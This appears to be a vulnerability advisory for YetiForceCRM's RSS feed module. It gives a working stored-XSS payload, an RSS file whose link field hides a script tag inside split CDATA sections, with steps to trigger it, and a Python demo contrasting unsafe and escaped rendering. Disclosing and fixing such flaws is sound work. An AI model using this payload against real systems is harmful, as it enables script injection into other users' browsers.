YetiForceCRM allows users to create RSS feeds without properly sanitizing the link field of the feed data it fetches from an external source. An attacker who controls the feed can use this to perform an XML injection attack that leads to stored cross-site scripting (XSS) on the target server: the CDATA sections in the payload below are reassembled by the parser into raw HTML, which is then written into the page unescaped.
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>RSS Test</title>
<!-- The CDATA pieces are concatenated by the parser and yield the text "><script>alert('xss')</script> -->
<link><![CDATA["]]><![CDATA[>]]><![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]></link>
<description>RSS Test Description</description>
<lastBuildDate>Fri, 12 Aug 2022 00:00:00 -0000</lastBuildDate>
<item>
<title>RSS Test</title>
<link>http://example.com</link>
<description>a post</description>
<author>[email protected]</author>
<pubDate>Fri, 12 Aug 2022 00:00:00 -0000</pubDate>
</item>
</channel>
</rss>
Step 1: Create a file rss_xss.xml with the content of the payload above and make it reachable by URL so the CRM can fetch it as a feed.
Step 2: Add a Feed Source pointing at that file via the Rss module.
Step 3: Click Save and the XSS should fire.
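The following added example (Python, not YetiForceCRM's code) parses the payload above the way a feed library would, showing that the CDATA pieces reassemble into `"><script>alert('xss')</script>` when the channel link text is extracted, and contrasts the unsafe interpolation of that value into an href with a scheme check plus attribute escaping. The `render_unsafe`/`render_safe` functions and the `#` fallback are illustrative assumptions, not the project's code.

```python
"""Added example: CDATA reassembly in an RSS <link> and safe vs. unsafe rendering.
Not YetiForceCRM's code; the render helpers below are assumptions for illustration."""
import html
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed copy of the advisory's payload (lastBuildDate/author/pubDate dropped as irrelevant).
PAYLOAD = """<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>RSS Test</title>
<link><![CDATA["]]><![CDATA[>]]><![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]></link>
<description>RSS Test Description</description>
<item>
<title>RSS Test</title>
<link>http://example.com</link>
<description>a post</description>
</item>
</channel>
</rss>"""


def channel_link(xml_text: str) -> str:
    """Return the channel <link> text as a feed parser sees it.
    Adjacent CDATA sections and character data are concatenated, so the
    split payload comes back as one contiguous string of HTML markup."""
    root = ET.fromstring(xml_text)
    return root.findtext("channel/link") or ""


def render_unsafe(link: str) -> str:
    """Vulnerable pattern (assumed for illustration): feed text dropped
    straight into an attribute, letting the leading \" close the href."""
    return f'<a href="{link}">feed</a>'


def render_safe(link: str) -> str:
    """Hardened pattern: accept only absolute http(s) URLs with a host,
    then HTML-escape the value for the attribute context."""
    parts = urlsplit(link)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        link = "#"  # reject anything that is not a plain web URL
    return f'<a href="{html.escape(link, quote=True)}">feed</a>'


if __name__ == "__main__":
    extracted = channel_link(PAYLOAD)
    print("parsed link text :", extracted)
    print("unsafe rendering :", render_unsafe(extracted))
    print("safe rendering   :", render_safe(extracted))
```

Run stand-alone, the unsafe rendering shows the `<script>` element escaping the attribute, while the safe rendering collapses the value to a harmless `#`; a legitimate `http://example.com` link passes the check unchanged.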